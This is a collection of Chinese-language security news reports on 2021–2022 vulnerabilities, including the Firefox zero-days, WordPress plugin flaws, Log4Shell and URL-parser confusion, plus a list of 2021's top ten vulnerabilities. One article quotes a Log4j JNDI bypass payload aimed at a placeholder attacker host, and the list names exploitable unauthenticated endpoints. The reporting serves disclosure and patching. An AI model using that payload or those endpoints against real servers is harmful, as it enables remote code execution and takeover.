Hackernews 编译，转载请注明出处： Mozilla 在其 Firefox 浏览器中加入了带外数据软件升级，包含了两个高影响力的安全漏洞。 Mozilla 称，这两个漏洞正在被大肆利用。 标记为 cve-2022-26485和 cve-2022-26486的零日漏洞被描述为影响 XSLT 参数处理和 WebGPU 行程间通讯(IPC)框架的use-after-free 漏洞。 XSLT 是一种基于 XML 的语言，用于将 XML 文档转换为网页或 PDF 文档，而 WebGPU 是一种新兴的 web 标准，被宣传为当前 WebGL JavaScript 图形库的继承者。 这两个漏洞的描述如下- CVE-2022-26485-在处理过程中删除 XSLT 参数可能导致 use-after-free 漏洞 CVE-2022-26486-WebGPU IPC 框架中的一条意外消息可能导致use-after-free漏洞和沙箱逃离 Use-after-free 漏洞(可以用来破坏有效数据并在受损系统上执行任意代码)主要源于“程序负责释放内存的部分的混乱” Mozilla 承认，“我们收到了这两个漏洞成为攻击武器的报告”，但没有透露任何与入侵或利用这些漏洞的恶意黑客的身份有关的技术细节。 考虑到这些漏洞，建议用户尽快升级到 Firefox 97.0.2，Firefox ESR 91.6.1，Firefox for Android 97.3.0，Focus 97.3.0和 Thunderbird 91.6.2。   消息来源：TheHackerNews，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

SamMobile 报道称，尽管三星总能在 Google 正式发布修复之前，就为自家规模庞大的 Android 移动设备提供安全更新。然而过去多年销售的三星智能机，还是被发现存在一个出厂即有的安全漏洞，使得黑客能够轻易提取包括密码在内的敏感信息。以色列特拉维夫大学的研究人员指出，问题在于 Galaxy S8 / S9 / S10 / S20 / S21 等系列机型未能妥善存储其加密密钥。 在近日发布的一份报告（PDF）中，Alon Shakevsky、Eyal Ronen 和 Avishai Wool 详细介绍了他们是如何绕过三星设备的安全措施的。 研究配图 – 1：设备信任区的软硬件隔离架构解析 文中涉及许多安全技术专业术语，需要读者具有一定的知识基础。庆幸的是，消费者们无需对此感到过于担心，因为研究人员及时地向三星进行了通报，该公司早已完成对上述安全隐患的修复。 研究配图 – 2：一款 Android 应用的硬件密钥管理示例 据悉，首个修复从 2021 年 8 月的安全补丁开始推送，然后于 10 月份完成了所有修补。若你仍在使用老旧的版本，还请尽快更新到受支持的最新版本。 研究配图 – 5：安全密钥导入流程流程简析 最后，若设备已经超出了三星的官方支持期，也可考虑换用仍在提供安全更新的第三方定制 ROM 。   （消息及封面来源：cnBeta）

UpdraftPlus 是一款可靠、易用的 WordPress 备份/还原和克隆插件。上周由于该插件存在严重漏洞，超过 200 万个 WordPress 网站得到了强制更新。该漏洞可能让未经授权的用户下载 WordPress 网站的备份。 JetPack 的开发人员在对 UpdraftPlus 进行内部审计时，发现了一个权限检查缺失的漏洞，该漏洞可能允许未经授权的用户访问这些备份。通常情况下，只有管理员才能访问它们。根据 UpdraftPlus 的图表，周四约有 170 万个网站下载了该更新。 JetPack 和 UpdraftPlus 都发布了关于该漏洞的警告。UpdraftPlus 的开发者指出如果你的 WordPress 网站已经对备份进行加密，那么存在的风险较小。这是因为 WordPress 对其存储的密码进行了加密，这应该可以保护它们不被获得未加密的备份的黑客攻击。JetPack 说大多数 WordPress 网站已经更新，并敦促那些没有更新的网站安装最新的 UpdraftPlus 补丁。   （消息及封面来源：cnBeta）

一位安全研究员在上周末的自由和开源软件开发者欧洲会议（FOSDEM）上围绕缓解像Spectre和Meltdown这样的处理器漏洞发表演讲，所提出的方式力求让性能成本可以忽略不计。 Cyberus科技公司的Sebastian Eydam在2022年FOSDEM会议上发言，谈到有可能在几乎没有性能成本的情况下缓解像Spectre和Meltdown这样的处理器漏洞。然而，目前这种方式处于安全研究阶段，而且只使用Hedron微型管理程序进行了原型测试。 这个替代现有软件缓解技术的缓解策略是将内核中与进程相关的信息转移到内核地址空间的进程本地部分。反过来，用户空间的攻击者将只能推断自己进程的信息，而不能推断其他进程的信息。 Eydam在他的摘要中总结道：”这种替代性的缓解措施涉及将内核中与进程相关的信息移到内核地址空间的进程本地部分。一个能够推断出其相关的内核页表内容的用户空间攻击者因此只能读取关于其自身进程的信息。在这些内核地址空间之间的切换是在不同进程的线程被安排时作为正常地址空间切换的一部分进行的，因此没有额外的性能开销。” 除了可能的缓解策略对性能的影响较低外，它也将是独立于CPU的… 但目前它只是处于研究阶段，唯一公布的代码是在Hedron微处理器上做的原型设计工作（GitHub工作）。 因此，如果这种方式像人们谈论的那样好，与今天的缓解措施的巨大性能成本相比，将会是用户端的一个胜利。然而，到目前为止，似乎还没有对这项研究进行任何独立的批判性分析，更不用说任何拟议的Linux内核补丁或类似的东西来显示其在现实世界中的可行性。如果英特尔工程师在研究Spectre和Meltdown的大约五年时间里，没有在内部考虑和评估过这种方法，那也是令人惊讶的。   （消息及封面来源：cnBeta）

Google 安全团队 Project Zero 近日分享了过去几年安全研究的统计数据，在 2019 年 1 月至 2021 年 12 月期间，团队共计报告了 376 个漏洞，期限为 90 天。其中 351 个（93.4%）已被修复，14 个（3.7%）被供应商标记为“WontFix”，11 个（2.9%）仍未修复。然而，在最后一类中，有 3 个仍在 90 天的期限内。 在所有被发现的漏洞中，微软产品中检测到了 96 个（26%），苹果检测到了 85 个（23%），而 Google 自己检测到了 60 个（16%）。具体数据如下： 从上面可以看出，供应商的情况都有积极的变化。然而，有趣的是，在 2021 年，宽限期被要求了 9 次，其中一半是由微软提出的。 在移动方面，iOS 有 76 个 BUG 被报告，三星产品有 10 个，Pixels 有 6 个。iOS 的平均修复时间为 70 天，而其他两个品牌为 72 天。如果你想知道为什么在iOS上检测到如此多的安全缺陷，这是因为苹果将大量的应用程序作为操作系统的一部分，而 Android 的应用程序更新主要是通过 Google Play 管理，所以不属于操作系统级别的缺陷。 在浏览器方面，Chrome 有 40 个 BUG，苹果的 WebKit 有 27 个 BUG，Firefox 有 8 个 BUG。WebKit 修补缺陷的速度最慢，为72天，Chrome 为30天，而 Firefox 为 38 天。 Google Project Zero 指出： 总的来说，我们看到数据中出现了一些有希望的趋势。供应商正在修复他们收到的几乎所有的 BUG，而且他们通常在 90 天的期限内完成，必要时还有14天的宽限期。在过去的三年里，供应商在大多数情况下都加快了他们的补丁，有效地将整个平均修复时间减少到约52天。 在2021年，只有一个 90 天的期限被超过。我们怀疑这种趋势可能是由于负责任的披露政策已经成为行业的事实标准，供应商更有能力对不同期限的报告做出快速反应。我们还怀疑，由于行业的透明度越来越高，供应商已经从彼此那里学到了最佳做法。 一个重要的注意事项：我们知道，与其他错误报告相比，来自Project Zero的报告可能是异常值，因为它们可能会得到更快的行动，因为存在着公开披露的实际风险（因为如果最后期限条件没有得到满足，团队就会披露），而且Project Zero是可靠的错误报告的可信来源。 我们鼓励供应商发布指标，即使是高水平的指标，以便更好地全面了解整个行业安全问题的修复速度，并继续鼓励其他安全研究人员分享他们的经验。   （消息及封面来源：cnBeta）

Hackernews 编译，转载请注明出处： 一个名为 PHP Everywhere 的 WordPress 插件中披露了一个关键的安全漏洞，这个插件在全世界有超过30,000个网站使用，攻击者可能会利用这个漏洞在受影响的系统上执行任意代码。 PHP Everywhere 用于在 WordPress 安装过程中打开 PHP 代码的开关，使用户能够在内容管理系统的 Pages、 Posts 和 Sidebar 中插入和执行基于 PHP 的代码。 以下这三个问题，在 CVSS 评级系统中评级9.9（满分为10），影响版本2.0.3及之后的版本，如下： CVE-2022-24663-订阅者 + 用户通过短代码远程执行代码 CVE-2022-24664-Contributor + 用户通过 metabox 远程执行代码，以及 CVE-2022-24665-Contributor + 用户通过gutenberg块远程执行代码 成功利用这三个漏洞可能导致恶意 PHP 代码的执行，这些代码可以被用来实现完全的站点接管。 安全公司 WordPress 表示，他们在1月4日向插件作者 Alexander Fuchs 披露了这个漏洞，随后在2022年1月12日发布了3.0版本的更新，完全删除了漏洞代码。 “这个插件的3.0.0版本的更新是一个突破性的变化，它删除了[php_everywhere]的短代码和小部件,”插件的更新描述页面写道。“从插件设置页面运行升级向导，将旧代码迁移到Gutenberg块。” 值得注意的是，3.0.0版本只通过Block editor编辑器支持 PHP 代码片段，因此仍然依赖 Classic Editor的用户必须卸载该插件，并下载一个替代解决方案来托管自定义 PHP 代码。 消息来源：TheHackerNews，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

上星期，我们以“创宇资讯”角度发布了2021年最受关注的十大网络安全事件。 以下为创宇资讯整理并总结出的2021年十大安全漏洞，希望以此为网络安全建设提供参考。 （转载本文请注明出处：https://hackernews.cc/archives/37322）   一．Apache Log4j2 远程代码执行漏洞   Apache Log4j2是一个基于Java的日志记录工具，该日志框架被大量用于业务系统开发，用来记录日志信息。 Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，攻击者仅仅需要向目标服务器发送精心构造的恶意数据触发Log4j2组件解析缺陷，就可以实现目标服务器任意命令执行，获取目标服务器权限。 由于日志记录存在的普遍性，所以该漏洞具有危害程度高、利用难度低、影响范围大、后续影响广的特点。可以预见，未来数月甚至数年该漏洞才能得到比较全面的修补。 漏洞涉及CVE编号： CVE-2021-44228 漏洞影响版本： Apache log4j2 2.0 至 2.14.1 版本   二．QNAP NAS Roon Server套件认证绕过、命令注入漏洞   威联通科技股份有限公司(QNAP Systems, Inc.)，是极少数以商用服务器获得世界认同的中国台湾省跨国企业，致力于研发并提供高质量网络储存设备及专业网络监控录像设备 给家庭、SOHO 族、以及中小企业用戶。 2021年6月11日，CNCERT物联网安全研究团队与启明星辰金睛安全研究团队共同发布《关于威联通设备2项0Day漏洞组合利用攻击的报告——RoonServer权限认证漏洞与命令注入漏洞》。报告中详细介绍了权限饶过漏洞（CVE-2021-28810）和命令注入漏洞（CVE-2021-28811）相关的细节，并指出早在2021年5月8日就已经捕获在野利用攻击。在后续和厂商的沟通中，QNAP官方于2021年6月4日重新发布修复后的应用。 在对在野攻击行为分析后确定攻击者尝试植入的载荷为eCh0raix勒索软件。该勒索软件会加密NAS上存储的文件并要求受害者通过TOR支付比特币赎金。 勒索软件通过NAS 0day传播不仅极具针对性且拥有极高的成功率。该漏洞不是第一个也不会是最后一个。 漏洞涉及CVE编号：CVE-2021-28810、CVE-2021-28811   三．Microsoft Exchange高危攻击链   2021年3月3日微软紧急发布了Exchange更新补丁，披露Exchange存在多个高危漏洞并且已被黑客作为攻击链的一部分进行利用，其中CVE-2021-26855通过服务器请求伪造绕过了Exchange Server身份验证，可以结合CVE-2021-26858/CVE-2021-27065形成高危攻击链。相关漏洞详情如下： CVE-2021-26855 服务端请求伪造漏洞，可以绕过Exchange Server的身份验证。 CVE-2021-26858/CVE-2021-27065 任意文件写入漏洞，需要身份验证。可配合CVE-2021-26855形成无需交互的高危攻击链。 漏洞涉及CVE编号：CVE-2021-26855、CVE-2021-26858、CVE-2021-27065   四．VMware vCenter Server 未授权远程命令执行漏洞   Vmware vCenter Server是ESXi的控制中心，可以从单一控制点统一管理数据中心的所有xSphere主机和虚拟机。 2021年5 月 25 日，VMware 官方发布安全公告，修复了 VMware vCenter Server 和 VMware Cloud Foundation 远程代码执行漏洞（CVE-2021-21985）和身份验证漏洞（CVE-2021-21986）。其中 CVE-2021-21985 漏洞攻击复杂度低，且不需要用户交互，攻击者可利用该漏洞在目标系统上执行任意命令，从而获得目标系统的管理权限。 漏洞涉及CVE编号：CVE-2021-21985 漏洞影响版本： Vmware vCenter Server 7.0 系列 < 7.0.U2b Vmware vCenter Server 6.7系列 < 6.7.U3n Vmware vCenter Server 6.5 系列 < 6.5.U3p Vmware Cloud Foundation 4.x 系列 < 4.2.1 Vmware Cloud Foundation 3.x 系列 < 3.10.2.1   五．Zyxel NAS FTP 服务未授权远程命令执行漏洞   Zyxel(合勤科技)是国际知名品牌的网络宽带系统及解决方案的供应商。 2020 年，Zyxel 多个型号 NAS 以及防火墙设备被曝出存在未授权 RCE 漏洞（CVE-2020-9054 ），该漏洞被用于地下黑市售卖，其价值高达 20000 美元，漏洞成因是 Zyxel NAS 和防火墙产品中使 用的 PAM 认证模块存在漏洞，未经身份认证的攻击者可以通过 Web 服务入口 weblogin.cgi 程序的 username 字段注入任意命令达到远程命令执行的目的。Zyxel 官方后续已经对在支持期内的设备释放了固件 补丁。 经过验证，Zyxel官方只修复了漏洞的入口点，对于存在漏洞的库/lib/security/pam_uam.so没有进行任何修复，这也导致该漏洞可以通过FTP服务所在端口再次触发。攻击者仅需要创建FTP连接使用恶意用户名登陆即可触发该漏洞。 漏洞涉及CVE编号：CVE-2020-9054 补丁绕过   六．Windows Print Spooler 远程代码执行漏洞   Windows Print Spooler 是 Windows 的打印机后台处理程序，广泛的应用于各种内网 中。 2021年6 月 29 日，有安全研究人员公开了了一个 Windows Print Spooler 相关的 exp，也被称为PrintNightmare。后经过验证，微软为该漏洞分配了一个新的CVE编号：CVE-2021-34527。利用该exp，攻击者 能够以 SYSTEM 权限控制域控主机，微软在7月7日紧急修复了该漏洞。 攻击者可以通过该漏洞绕过 SplAddPrinterDriver 的安全验证，并在打印服务器中安装 恶意的驱动程序。若攻击者所控制的用户在域中，则攻击者可以连接到 DC 中的 Spooler 服务，并利用该漏洞在 DC 中安装恶意的驱动程序，完整的控制整个域环境。 漏洞涉及CVE编号：CVE-2021-34527   七．Apache HTTPd 路径穿越和远程命令执行漏洞   2021年9 月 29 日，国外安全研究员向 Apache 官方提交了 Apache HTTPd 2.4.49 的一个路径穿越漏洞(CVE-2021-41773)，官方于 10 月 1 日修复了该漏洞并且于 10 月 4 日发布新版本 Apache HTTPd 2.4.50。 2021年10 月 5 日，Github 上开始出现漏洞 CVE-2021-41773 的 POC，经过验证该漏洞可以在文件目录被授权访问的情况下进行文件读取，甚至可以在 cgi 模式下执行命令。与此同时有安全研究员发现该漏洞可以被绕过，于是 10 月 7 日，Apache 官方再次发布新版本 Apache HTTPd 2.4.51 修复了 CVE-2021-41773 的绕过问题并且注册了新的 CVE 编号 CVE-2021-42013。 漏洞涉及CVE编号：CVE-2021-41773，CVE-2021-42013   八．Confluence Webwork OGNL表达式注入漏洞   Confluence是一个专业的企业知识管理与协同软件，也可以用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论、信息推送等。 2021年8月25日，Confluence发布漏洞公告，Confluence Webwork OGNL 存在表达式注入漏洞，编号为：CVE-2021-26084。 经过分析，2021年9月1日，国外安全研究人员公开了该漏洞细节，未授权的攻击者可以通过该漏洞实现远程代码执行。经过验证，无需授权访问的接口 /pages/createpage-entervariables.action 存在OGNL表达式注入的问题，这也使得该漏洞的影响面和危害进一步扩大。 漏洞涉及CVE编号：CVE-2021-26084 漏洞影响版本： Confluence Server & Confluence Data Center < 6.13.23 Confluence Server & Confluence Data Center < 7.11.6 Confluence Server & Confluence Data Center < 7.12.5 Confluence Server & Confluence Data Center < 7.4.11   九．锐捷网关未授权远程命令执行漏洞   锐捷⽹络成⽴于2000年1⽉，是中国数据通信解决⽅案领导品牌。2021年1⽉12⽇，⽹上出现了锐捷⽹关Web管理系统的未授权远程命令执行漏洞的 PoC。由于 /guest_auth/guestIsUp.php接口未过滤用户输入，直接拼接到命令执行，未经授权的远程攻击者可以利用该漏洞以root权限在目标设备执行任意命令。 该漏洞影响范围比较广，通过ZoomEye网络空间搜索引擎能够搜索到103459条锐捷⽹关Web管理系统相关的记录（数据查询日期：2021年1月19日），主要分布在中国。   十．GitLab未授权远程命令执行漏洞   GitLab是由GitLab Inc.开发，一款基于Git的完全集成的软件开发平台。 2021年4⽉14⽇，GitLab 官⽅发布安全通告，GitLab CE/EE 中存在认证 RCE 漏洞，并分配漏洞编号CVE-2021-22205，随后也有相关的POC公布，但由于需要认证，该漏洞影响范围有限。 2021年10月25日，HN Security 发文称，有在野攻击者通过访问特定端点未认证利用了该 RCE 漏洞，并公开了攻击者使用的 payload。随后国内外安全厂商陆续检测到该漏洞的在野利用。漏洞利用难度的降低，带来的是漏洞影响范围的扩大，影响有限的漏洞也能发挥出惊人的破坏力。 漏洞涉及CVE编号：CVE-2021-22205

美国网络安全与基础设施安全局（CISA）高级官员周一表示，安全专业人员将在很长一段时间内，与严重的 Log4j 安全漏洞作斗争。如果未打补丁或无视修复，一个月前在 Apache Log4j 中曝光的 Java 日志库安全漏洞，将给互联网带来巨大的风险。网络攻击者可利用广泛使用的软件中的漏洞，接管受害计算机和服务器，进而使消费电子产品和政企系统全面沦陷。 （截图 via NIST） 在周一的电话会议期间，CISA 主任 Jen Easterly 向记者透露：尽管还有许多攻击未见诸报端，但目前尚未有任何美国联邦机构受到 Log4j 漏洞、以及重大网络攻击的损害。 该漏洞波及数以千万计的互联网联网设备，影响范围之广，使之成为 CISA 史上最糟糕的一次经历。 此外攻击者可能正在等待一个大家都感到懈怠的时机，从而让 Log4Shell 能够在未来更好地用于入侵。 （截图 via CISA） Jen Easterly 还援引了 2017 年发生的 Equifax 数据泄露事件，其同样归咎于开源软件中的一个漏洞，最终导致近 1.5 亿美国人的个人信息泄露。 截至目前，大多数漏洞利用仍集中在较低级的加密货币挖矿、或尝试将受害设备拖入僵尸网络。最先曝出的，就是微软旗下的《我的世界》游戏服务器。 与此同时，世界各地也发生了类似的大规模攻击。比如上月，比利时国防部就证实，其系统也因 Log4j 安全漏洞而遭到了破坏。   （消息及封面来源：cnBeta）

 Hackernews 编译，转载请注明出处： 研究员在对16种不同的URL解析库进行研究时发现了不一致和混淆，这可能被用来绕过验证，并且易受到黑客的攻击。 在一项由网络安全公司 Claroty 和 Synk 联合进行的深入分析中，他们在许多第三方库中发现八个安全漏洞，这些漏洞是用 C、 JavaScript、 PHP、 Python 和 Ruby 语言编写的，并被多个 web 应用程序使用。 研究人员在与 The Hacker News 共享的一份报告中表示: “ URL 解析中的混乱可能会导致软件中出现意想不到的情况(比如 web 应用程序) ，并可能被攻击者利用来导致拒绝服务情况、信息泄露，或者可能造成远程代码执行攻击。” 由于 URL 是一种基本机制，可以请求和检索位于本地或网络上的资源，解析库阐释 URL 请求的差异可能会给用户带来重大风险。 一个典型的例子是上个月在无处不在的 Log4j 日志框架中披露的 Log4Shell 漏洞，这个缺陷的原理是这样的，即当一个易受攻击的应用程序对一个恶意攻击者控制的字符串进行日志记录时，该字符串会导致一个 JNDI 查找，该字符串连接到一个攻击者操作的服务器，并执行任意的 Java 代码。 尽管美国 Apache软件基金会安全局(ASF)很快提出了一个修复方案来解决这个问题，但是很快就发现通过”${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}” 格式的特制输入可以绕过这个方案，再次允许远程 JNDI 查找实现代码执行。 “这种绕过原理是这样的，即两个不同的(!)URL 解析器在 JNDI 查找过程中被使用了 ，一个解析器用于验证 URL，另一个解析器用于获取 URL，并且根据每个解析器如何处理 URL 的片段部分(#) ，权限也会发生变化,”研究人员说。 具体来说，如果输入被视为一个常规的 HTTP URL，Authority 组件(域名和端口号的组合)将在遇到片段标识符时结束，而如果将其视为一个 LDAP URL，解析器将分配整个”127.0.0[.]1#.evilhost.com:1389″作为权限，因为 LDP URL 规范没有说明片段。 实际上，能够发现这八个漏洞有两个主要原因，使用多个解析器是其一，另一个原因是当库遵循不同的 URL 规范时出现不一致问题时，实际上引入了一个可利用的漏洞。 混淆中不协调的URL包含反斜杠(“\”)，不规则的斜杠数量(例如, https:///www.example[.]com)或者 URL 编码数据(“%”)，有的URL缺少 URL 方案，这可能被用来获得远程代码执行，甚至出现拒绝服务(DoS)和开放重定向钓鱼攻击。 发现的8个漏洞列表如下，所有这些漏洞都已经由各自的维护者解决了 Belledonne’s SIP Stack (C, CVE-2021-33056) Video.js (JavaScript, CVE-2021-23414) Nagios XI (PHP, CVE-2021-37352) Flask-security (Python, CVE-2021-23385) Flask-security-too (Python, CVE-2021-32618) Flask-unchained (Python, CVE-2021-23393) Flask-User (Python, CVE-2021-23401) Clearance (Ruby, CVE-2021-23435) “许多现实生活中的攻击场景可能来自不同的解析原语,”研究人员说。为了保护应用程序不受 URL 解析漏洞的影响，“有必要充分了解是什么解析器参与了整个过程，解析器之间的区别，它们如何解释不同的错误 URL，以及它们支持什么类型的 URL。”  消息来源：TheHackerNews，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

12月14日，Apache Log4j 2团队发布了Log4j 2.16.0以修复这些漏洞。在补丁应用之前，所有现有的Apache Log4j运行服务器都将成为黑客的潜在目标。微软最近更新了预防、检测和解决Log4j 2漏洞的指南，向客户给出了解决和预防方案。 据微软称，攻击者正在积极利用Log4j漏洞，而且在12月的最后几周，利用的尝试仍然很多。微软提到，许多现有的攻击者在他们现有的恶意软件工具包和战术中增加了对这些漏洞的利用，扩大利用Log4j漏洞的可能性很大。 微软为客户发布了以下指导： 鼓励客户利用脚本和扫描工具来评估其风险和影响。 微软已经观察到攻击者使用许多相同的库存技术来定位目标。已经观察到复杂的对手（如国家支持的黑客行为者）和试图以攻击牟利者都在利用这些漏洞。 微软建议客户对发现有漏洞的设备进行额外审查。 客户应该了解到漏洞代码和扫描功能的广泛可用性对他们的环境是一个真正的和现实的危险。 由于受影响的软件和服务很多，而且考虑到更新的速度，预计这将有一个很长的补救过程，一段时间内需要对该漏洞加以持续不断的警惕。   （消息及封面来源：cnBeta）